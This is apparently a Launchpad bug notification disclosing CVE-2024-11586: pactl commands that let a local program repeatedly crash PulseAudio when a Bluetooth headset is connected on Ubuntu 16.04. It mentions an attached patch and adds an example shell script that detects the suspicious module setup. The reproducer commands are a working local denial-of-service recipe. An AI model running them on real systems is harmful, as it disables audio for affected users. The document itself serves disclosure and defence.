https://www.cve.org/CVERecord?id=CVE-2024-11586 published.

Updates will go to ESM.

Thanks Ratchanan!

** Information type changed from Private Security to Public Security

https://bugs.launchpad.net/bugs/2078822

Title:
  With Bluetooth headset connected, a malicious program can crash
  PulseAudio on Ubuntu 16.04

Status in pulseaudio package in Ubuntu:
  New

Bug description:
  On Ubuntu 16.04, a malicious app could abuse a Bluetooth module
  configuration for Ubuntu Touch to crash PulseAudio:

  ```
  pactl unload-module module-bluez5-discover
  pactl load-module module-null-sink sink_name=sink.fake.sco rate=8000 channels=1
  pactl load-module module-null-source source_name=source.fake.sco rate=8000 channels=1
  pactl load-module module-bluez5-discover sco_sink=sink.fake.sco sco_source=source.fake.sco
  # Now, connect a Bluetooth headset, then:
  pactl list cards # Make note of Bluetooth card name.
  pactl set-card-profile bluez_card.<address> headset_head_unit
  pactl set-sink-volume sink.fake.sco 69
  ```

  An app could repeatedly do this, preventing audio from working as long
  as a Bluetooth headset is still connected.

  This was discovered while working on a similar patch on UBports' Ubuntu
  Touch 20.04. Admittedly, I was not able to actually test this on
  Ubuntu 16.04 + ESM proper yet, but a similar set of commands was tested
  to be able to crash PulseAudio on Ubuntu Touch 20.04, which carries a
  forward-ported version of the SCO-over-PCM patch.

  A patch which should fix this issue is attached. This is a problem in
  the Ubuntu-specific SCO-over-PCM patch, and thus is not applicable in
  other distros.
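
An added example, not part of the original bug report or of the Ubuntu patch: a shell check for the module layout the reproducer sets up, a `module-bluez5-discover` instance whose `sco_sink`/`sco_source` arguments name null devices. The function names, the sample listing and the premise that a legitimate configuration points these arguments at real devices are assumptions of this example.

```shell
#!/bin/sh
# Constructed sample of `pactl list short modules` output
# (tab-separated: index, module name, arguments).
sample_modules() {
    printf '%s\t%s\t%s\n' \
        5 module-native-protocol-unix '' \
        24 module-null-sink 'sink_name=sink.fake.sco rate=8000 channels=1' \
        25 module-null-source 'source_name=source.fake.sco rate=8000 channels=1' \
        26 module-bluez5-discover 'sco_sink=sink.fake.sco sco_source=source.fake.sco'
}

# Reads a module listing on stdin, prints one line per finding and
# returns 1 if any finding was printed, 0 otherwise.
audit_sco_modules() {
    awk -F '\t' '
    # Value of key=value inside a space-separated argument string, or "".
    function arg(args, key,    n, i, parts) {
        n = split(args, parts, " ")
        for (i = 1; i <= n; i++)
            if (index(parts[i], key "=") == 1)
                return substr(parts[i], length(key) + 2)
        return ""
    }
    # Report an SCO argument that names a device created by a null module.
    function check(id, key, dev) {
        if (dev != "" && (dev in null_dev)) {
            printf "module %s: %s=%s is a null device (module %s)\n", id, key, dev, null_dev[dev]
            bad = 1
        }
    }
    $2 == "module-null-sink"       { null_dev[arg($3, "sink_name")] = $1 }
    $2 == "module-null-source"     { null_dev[arg($3, "source_name")] = $1 }
    $2 == "module-bluez5-discover" { discover[$1] = $3 }
    END {
        # Checked at the end so the load order of the modules does not matter.
        for (id in discover) {
            check(id, "sco_sink", arg(discover[id], "sco_sink"))
            check(id, "sco_source", arg(discover[id], "sco_source"))
        }
        exit bad + 0
    }'
}

# Live use: pactl list short modules | audit_sco_modules
sample_modules | audit_sco_modules || true
```
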
